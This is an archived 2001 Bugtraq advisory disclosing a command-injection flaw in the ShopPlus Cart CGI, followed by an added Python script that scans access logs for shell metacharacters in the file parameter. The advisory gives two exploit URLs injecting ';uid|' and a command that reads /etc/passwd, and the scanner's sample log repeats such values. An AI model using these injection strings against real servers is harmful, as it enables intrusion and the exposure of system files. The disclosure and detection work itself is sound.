[22533] in bugtraq

ShopPlus Cart

daemon@ATHENA.MIT.EDU (Kernel|X|)
Wed Sep 5 15:36:36 2001

Date: Wed, 5 Sep 2001 12:06:56 -0700 (PDT)
Message-Id: <200109051906.f85J6u980496@voyager.myzona.net>
To: bugtraq@securityfocus.com
From: Kernel|X| <secure@punkass.com>


                    ------------[ advisory ]------------
name: ShopPlus Cart

Bug Information:
The ShopPlus shopping cart system allows you to build a store or a mall on the Internet.
Because of its flexibility, it allows you to sell virtually any product or services and
fully customize the shopping experience of your web site.
http://www.ksofttech.com/help/shopplus/

Problem:
The script doesn't check symbols (shell metacharacters such as ; and |) in the file parameter, so any user can execute commands on the web server.

Exploit:
host/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;uid|
host/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|


Bug found by Kernel|X| and aLph4Num3ric
E-Mail: 
secure@punkass.com               [kernel|x|]
alph4num3ric@crackdealer.com  [aLph4Num3ric]
WWW: www.russiahack.com / www.tmgroup.sh

------------
Thank you for using Anonymous mail system! message sent from www.tmgroup.sh
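
Added example, not part of the original advisory: a log check that flags requests to shopplus.cgi whose decoded file parameter contains shell metacharacters or is not a plain file name. The log lines, the allowlist pattern and the function names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Characters a shell gives special meaning to; none belongs in a page name.
SHELL_META = set(";|&`$<>(){}\\\n\r")
# Assumption: legitimate `file` values are plain names such as "index.html".
SAFE_FILE = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]*\Z")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

# Constructed access-log lines (common log format, documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Sep/2001:12:00:01 -0700] "GET /scripts/shopplus.cgi'
    '?dn=example.com&cartid=1001&file=index.html HTTP/1.0" 200 5120',
    '192.0.2.77 - - [05/Sep/2001:12:00:09 -0700] "GET /scripts/shopplus.cgi'
    '?dn=example.com&cartid=1001&file=;uid| HTTP/1.0" 200 312',
    '192.0.2.77 - - [05/Sep/2001:12:00:15 -0700] "GET /scripts/shopplus.cgi'
    '?dn=example.com&cartid=1001&file=%3Buid%7C HTTP/1.0" 200 312',
    '192.0.2.10 - - [05/Sep/2001:12:00:20 -0700] "GET /index.html?file=;x| '
    'HTTP/1.0" 200 100',
]

def suspicious_file_param(log_line):
    """Return the decoded `file` value if the request should be flagged."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/shopplus.cgi"):
        return None
    # parse_qs percent-decodes, so %3B and %7C are caught as well as ; and |
    params = parse_qs(url.query, keep_blank_values=True, separator="&")
    for value in params.get("file", []):
        if SHELL_META & set(value) or not SAFE_FILE.match(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged request."""
    hits = []
    for n, line in enumerate(lines, 1):
        value = suspicious_file_param(line)
        if value is not None:
            hits.append((n, value))
    return hits

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print(f"line {n}: file={value!r}")
```

The same allowlist pattern can be applied inside the CGI itself before the parameter is used, rejecting any request whose file value does not match.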
